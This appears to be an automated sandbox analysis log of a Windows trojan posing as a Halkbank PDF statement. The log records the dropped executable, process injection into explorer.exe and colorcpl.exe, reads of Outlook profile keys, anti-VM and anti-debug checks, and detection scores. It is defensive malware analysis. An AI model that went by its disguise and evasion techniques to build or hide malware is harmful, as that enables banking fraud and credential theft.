          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2D6163_2_00B2D616
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B31FF13_2_00B31FF1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3DFCE3_2_00B3DFCE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: String function: 00403400 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: String function: 004260F8 appears 32 times
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: String function: 0042A4C8 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: String function: 00A6B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E5F3 NtCreateFile,3_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E6A3 NtReadFile,3_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E723 NtClose,3_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E7D3 NtAllocateVirtualMemory,3_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E5ED NtCreateFile,3_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E69D NtReadFile,3_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041E7CD NtAllocateVirtualMemory,3_2_0041E7CD
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AA98F0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AA9860
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk,3_2_00AA9840
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk,3_2_00AA99A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AA9910
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk,3_2_00AA9A20
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AA9A00
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk,3_2_00AA9A50
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA95D0 NtClose,LdrInitializeThunk,3_2_00AA95D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk,3_2_00AA9540
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AA96E0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AA9660
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AA97A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AA9780
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AA9FE0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AA9710
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA98A0 NtWriteVirtualMemory,3_2_00AA98A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9820 NtEnumerateKey,3_2_00AA9820
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AAB040 NtSuspendThread,3_2_00AAB040
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA99D0 NtCreateProcessEx,3_2_00AA99D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9950 NtQueueApcThread,3_2_00AA9950
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9A80 NtOpenDirectoryObject,3_2_00AA9A80
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9A10 NtQuerySection,3_2_00AA9A10
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AAA3B0 NtGetContextThread,3_2_00AAA3B0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9B00 NtSetValueKey,3_2_00AA9B00
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA95F0 NtQueryInformationFile,3_2_00AA95F0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9520 NtWaitForSingleObject,3_2_00AA9520
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AAAD30 NtSetContextThread,3_2_00AAAD30
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9560 NtWriteFile,3_2_00AA9560
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA96D0 NtCreateKey,3_2_00AA96D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9610 NtEnumerateValueKey,3_2_00AA9610
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9670 NtQueryInformationProcess,3_2_00AA9670
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9650 NtQueryValueKey,3_2_00AA9650
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9730 NtQueryVirtualMemory,3_2_00AA9730
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AAA710 NtOpenProcessToken,3_2_00AAA710
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9760 NtOpenProcess,3_2_00AA9760
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA9770 NtSetInformationFile,3_2_00AA9770
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AAA770 NtOpenThread,3_2_00AAA770
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 35%
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 44%
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\vokkqsp.exe "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess created: C:\Users\user\AppData\Local\Temp\vokkqsp.exe C:\Users\user\AppData\Local\Temp\vokkqsp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\vokkqsp.exe "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwfJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess created: C:\Users\user\AppData\Local\Temp\vokkqsp.exe C:\Users\user\AppData\Local\Temp\vokkqsp.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF64E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/5@8/6
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: colorcpl.pdbGCTL source: vokkqsp.exe, 00000003.00000002.346318075.0000000000E60000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: vokkqsp.exe, 00000003.00000002.346318075.0000000000E60000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vokkqsp.exe, 00000001.00000003.302185961.000000001A230000.00000004.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000001.00000003.306583480.000000001A0A0000.00000004.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.308452464.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.306750536.000000000070D000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000B5F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.346236668.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.000000000518F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.343907038.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.0000000005070000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vokkqsp.exe, vokkqsp.exe, 00000003.00000003.308452464.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.306750536.000000000070D000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000B5F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.346236668.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.000000000518F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.343907038.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.0000000005070000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeUnpacked PE file: 3.2.vokkqsp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043A222 push ecx; ret 1_2_0043A235
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00403446 push ecx; ret 1_2_00403459
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00403CB7 push ebx; retf 1_2_00403CB8
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00407033 push ds; retf 3_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041B377 pushad ; iretd 3_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0041B379 push eax; iretd 3_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00403444 push ebp; ret 3_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004055DA push ecx; ret 3_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004105E3 push esi; iretd 3_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00401DB0 push eax; ret 3_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00ABD0D1 push ecx; ret 3_2_00ABD0E4
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\vokkqsp.exeJump to dropped file
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5864Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A96A60 rdtscp 3_2_00A96A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeAPI coverage: 4.6 %
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeAPI coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00424002 FindFirstFileExW,1_2_00424002
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040101E FindFirstFileW,FindClose,1_2_0040101E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040101F FindFirstFileW,FindClose,1_2_0040101F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004243EC FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_004243EC
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeAPI call chain: ExitProcess graph end nodegraph_1-31332
          Source: explorer.exe, 00000004.00000000.316523149.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
          Source: explorer.exe, 00000004.00000002.578290288.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.548961361.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000002.573776968.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000003.448193988.00000000083E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446712622.00000000083E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578290288.00000000083E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.00000000083E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
          Source: explorer.exe, 00000004.00000003.446712622.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.552526417.000000000CDEA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: colorcpl.exe, 00000005.00000002.571083192.0000000007C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.578290288.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: colorcpl.exe, 00000005.00000002.568364047.0000000003529000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`m
          Source: explorer.exe, 00000004.00000003.554719626.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.581222267.000000000D011000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448300348.000000000D011000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.554742792.000000000D011000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.550859104.000000000D011000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558118829.000000000D011000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00423073 IsDebuggerPresent,1_2_00423073
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004010F4 CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,CloseHandle,ReadFile,CloseHandle,CloseHandle,MultiByteToWideChar,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,MultiByteToWideChar,GetProcessHeap,HeapFree,SetWindowTextW,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,SendMessageW,SetFocus,GetWindowTextW,lstrcmpW,GetWindowTextLengthW,SendMessageW,SendMessageW,SendMessageW,1_2_004010F4
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A96A60 rdtscp 3_2_00A96A60
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426169 mov eax, dword ptr fs:[00000030h]1_2_00426169
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426126 mov eax, dword ptr fs:[00000030h]1_2_00426126
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004261AC mov eax, dword ptr fs:[00000030h]1_2_004261AC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426207 mov eax, dword ptr fs:[00000030h]1_2_00426207
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004262BC mov eax, dword ptr fs:[00000030h]1_2_004262BC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426344 mov eax, dword ptr fs:[00000030h]1_2_00426344
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426375 mov eax, dword ptr fs:[00000030h]1_2_00426375
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00426300 mov eax, dword ptr fs:[00000030h]1_2_00426300
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040DF53 mov ecx, dword ptr fs:[00000030h]1_2_0040DF53
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA90AF mov eax, dword ptr fs:[00000030h]3_2_00AA90AF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A0 mov eax, dword ptr fs:[00000030h]3_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A9F0BF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]3_2_00A9F0BF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9F0BF mov eax, dword ptr fs:[00000030h]3_2_00A9F0BF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A69080 mov eax, dword ptr fs:[00000030h]3_2_00A69080
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]3_2_00AE3884
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE3884 mov eax, dword ptr fs:[00000030h]3_2_00AE3884
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A658EC mov eax, dword ptr fs:[00000030h]3_2_00A658EC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]3_2_00AFB8D0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]3_2_00A9002D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9002D mov eax, dword ptr fs:[00000030h]3_2_00A9002D
